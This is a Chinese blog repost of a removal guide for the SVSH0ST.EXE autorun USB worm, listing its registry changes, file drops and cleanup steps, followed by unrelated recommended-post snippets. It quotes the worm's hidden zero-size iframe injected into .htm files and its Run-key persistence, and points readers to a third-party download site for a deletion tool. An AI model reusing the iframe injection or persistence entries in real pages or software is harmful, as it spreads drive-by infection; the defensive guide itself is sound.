(SVSH0ST.EXE)病毒的分析解决(来自网络)

最新推荐文章于 2020-11-14 09:31:43 发布
最新推荐文章于 2020-11-14 09:31:43 发布
阅读量429 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengmm521/article/details/78438404
版权

Virus.Win32.AutoRun.cp(SVSH0ST.EXE)病毒的分析解决
作者:佚名  来源:不详  发布时间:2007-7-19 20:32:48

 

  添加项禁止修改主页

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"HomePage"=dword:00000001

  其他行为:

  修改 .htm 网页文件,在尾部添加(由生成器指定)

<IfrAmE src=http://www.XXXX.com/test.htm width=0 height=0></IfrAmE>
  删除后辍为 .gho 的文件

  访问 http://ll80.com/xx/xx.HTM 进行统计

  注:

  %system%代表Windows操作系统的系统文件夹路径,并非正式的系统环境变量。

  对于操作系统版本为Windows XP,装在默认路径的系统,%system%指C:\WINDOWS\system32文件夹

  清除方法:

  1. 结束进程(步骤:ctrl+alt+del调用任务管理器)

%System%\SVSH0ST.EXE

  2.删除文件(如无法直接删除,可到down.591ni.cn下载费尔木马强制删除器工具.zip进行强制删除)

%System%\SVSH0ST.EXE

%System%\dpserio1.dll

%System%\autorun.inf

X:\autorun.inf

X:\lcg.exe

  3.删除病毒启动项与禁止修改IE主页项(注册表打开方式:开始菜单-运行-输入“regedit”)

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"svchost"="%System%\SVSH0ST.EXE"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]

"HomePage"=

  4. 修改IE主页(直接打开IE修改).

  5.修复被修改的网页文件

  备注: 此病毒为生成器所生成,在我们的博客上已经有相应报道

        此生成器目前还有诸多bug

 名种U盘病毒大同小异,请大家在使用U盘时一定要注意。本文来自:王国学习联盟(http://www.591ni.cn/home/dir/

 

woodcol
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全应急响应典型案例集
glb111的博客
04-09 1240
2018年1月,奇安信集团安服团队接到某医院的服务器安全应急响应请求。该机构反馈有几台服务器出现重启/蓝屏现象,应急响应人员初步判定为感染了勒索病毒。应急响应人员对重启/蓝屏服务器分析后,判定均遭受“永恒之蓝”勒索病毒,同时遭受感染的服务器中部分文件被加密。通过对服务器进行漏洞检查发现服务器存在MS17-010漏洞,同时发现服务器开放了445端口。通过本次安全事件,医院信息系统暴露了诸多安全隐患,包括未定期开展安全评估工作,导致内部服务器存在严重高危漏洞;安全域划分不明确,较为混乱;安全意识仍需加强等。
django模板使用
silent喵的专栏
06-02 1万+
在setting中设置好数据库,在视图中直接编辑模板:def index(request): html = 'def index(request): html = 'Welcome to my movie site!' alllist = Movie.objects.all() dir = r'F:/pythonwork/show/templates/index.html'
xx_分析病毒 -- 写文件 读文件 改主页
weixin_34357267的博客
08-23 47
简单的使用writefile写文件、#include <windows.h>#include <stdio.h>int main( ){//调用CreateFile函数以只写方式打开一个文件HANDLE hFile=CreateFile("c:\\a.txt",GENERIC_WRITE,FILE_SHARE_READ,...
wannacry
u011975363的专栏
12-18 3222
对应的IOC:www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 勒索病毒的勒索过程: 勒索病毒文件一旦进入本地,就会自动运行,同时删除勒索软件样本,以躲避查杀和分析。接下来,勒索病毒利用本地的互联网访问权限连接至黑客的C&amp;amp;amp;amp;C服务器,进而上传本机信息并下载加密公钥。然后,利用系统内部的加密处理,是一种不可逆的加密,除了病毒开发者本人,其他人...
ARP TSC 蠕虫病毒专杀工具
11-08
检测电脑是否感染arp病毒,直接点击exe格式的文件,在report文件夹种中可以看见简则结果
无意中看到的一个ARP蠕虫病毒专杀工具
02-10
无意中看到的一个ARP蠕虫病毒专杀工具 运行TSC.exe文件,不要关让它一直运行完,然后查看report文档便可。 更详细的内容请看:http://soft.xtzj.com/download/safe/wlaq/2007-03-24/254.html
svsh:daemontools,perp,s6和runit的过程监控外壳
01-31
总的来说,svsh及其集成的框架为系统管理员提供了一套强大、灵活的过程管理解决方案,帮助他们确保服务的稳定运行和高效的故障恢复。了解并熟练掌握这些工具的使用,对于提高系统的可靠性有着至关重要的作用。
chrome浏览器美化插件:让您的浏览器页面冒水泡, 游小鱼儿
weixin_34252686的博客
03-02 9159
  下载插件和效果图   这是一个让你的浏览器冒泡泡的插件, 浏览网页的时候仿佛置身于海底世界;   插件下载地址:http://files.cnblogs.com/files/diligenceday/chromeExtension.crx.zip   效果图:     在线预览页面 &lt;!DOCTYPE html&gt; &lt;html lang="en"&...
MSP430F5-04-PMM.pdf
02-11
通过对MSP430F5系列单片机中PMM电源管理模块及供电监控功能的深入分析,我们可以看到这款单片机在电源管理方面的强大能力。这些特性不仅有助于提高系统的稳定性和可靠性,还能有效延长电池驱动应用的工作时间,非常...
基于SSM开发的宠物在线医疗管理系统 小程序 SpringBoot
m0_52503798的博客
11-14 682
10037基于SSM开发的宠物在线医疗管理系统 代码 鏈-椄:https://pan@baidu@com/s/1J6jgZDc60GVup3Se9NTpsw (把@换成 . 就可正常访问) 趧-紶-碼:9274 f/u枝此段-吶傛打开baidu網盤手机App,caozuo更方便哦 技术 Spring + SpringMVC + Mybatis 工具 eclipse + tomact + mysql + jdk 功能详情 功能详情 角色管理 账号管理 用户管理 预约挂号 健
360勒索病毒防御工具
08-14
360提供的,勒索病毒防御工具,大家试试!很好用,做好防御工作
勒索病毒端口查看器
08-21
勒索病毒端口查看器,可以查看本地打开的端口、远程IP地址、远程端口和所属的进程,可以看到病毒进程打开的很多个端口,勒索病毒文件的主要文件有windows目录下的mssecsvr.exe、mssecsvc.exe和tasksche.exe。还可以一键关闭445端口。
WannaCry勒索病毒兴起,程序猿&程序媛快快动起来--备份数据,停掉危险端口,打补丁~
weimeixiehou的博客
05-14 1370
背景: 2017年5月12日20时开始,勒索病毒WannaCry肆虐全球,利用Windows操作系统漏洞( NSA 之前被泄露的名为 ETERNALBLUE (永恒之蓝)的黑客工具,其利用微软服务器消息区块(SMB)协议中的 MS17-010 漏洞在 PC 或服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。据悉微软已于2017年3 月14 日就已发布修复该漏洞的 安全补丁,但并非所
SMSS.EXE病毒处理
CLassic_Ms的专栏
09-10 2487
SMSS.EXE(Session Manager Subsystem),该进程为会话管理子系统用以初始化系统变量,MS-DOS驱动名称类似LPT1以及COM,调用Win32壳子系统和运行在Windows登陆过程。它是一个会话管理子系统,负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的,包括已经正在运行的Winlogon,Win32(Csrss.exe)线程和设定的系统变量作出反映。
Jupyter Notebook 修改默认打开的文件夹的位置
热门推荐
MirrorN的博客
10-06 3万+
初次使用Jupyter Notebook,确实好用啊!!,又好看又好用,不过还是遇到了一个问题,安装好之后,打开Jupyter Notebook 的时候,默认的文件夹的位置是C盘下面的XXX目录,但是我想把文件保存到其他的文件夹下, 发现知乎上有这个问题的详细解答,(附上问题链接ipython notebook 如何修改一开始打开的文件夹路径?)在这里记录下解决方法: 首先在cmd下使用下面的命令...
勒索病毒与大家分享tpmagentservice.dll和TrustedHostServeces.exe
爱干点啥干点儿啥
01-27 1万+
有大约56个DLL文件。通过svchost.exe和spoolsv.exe,注入到系统进程。 会在 C:\windows\SecureBootThemes\Microsoft C:\windows\System32\SecureBootThemes 俩文件夹下面。 通常有两个配置文件。svchost.xml和spoolsv.xml,日志文件为stage2.txt 这是第一个svch
Host文件位置和作用介绍
Richard__Z的博客
05-08 2780
Hosts是一个没有扩展名的系统文件,其基本作用就是将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从Hosts文件中寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到, 则系统再会将网址提交DNS域名解析服务器进行IP地址的解析,如果发现是被屏蔽的IP或域名,就会禁止打开此网页! Host文件的位置:
MSP430单片机电源管理与系统控制模块解析
在启动时,SVSH和SVSL功能自动启用。DVCC(高电压)和VCORE(低电压)的范围分别在表4-1和4-2中给出,表4-3详细描述了上电期间系统的行为。在系统复位后,高低电压管理会自动释放到预设状态。 此外,MSP430F5438还...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值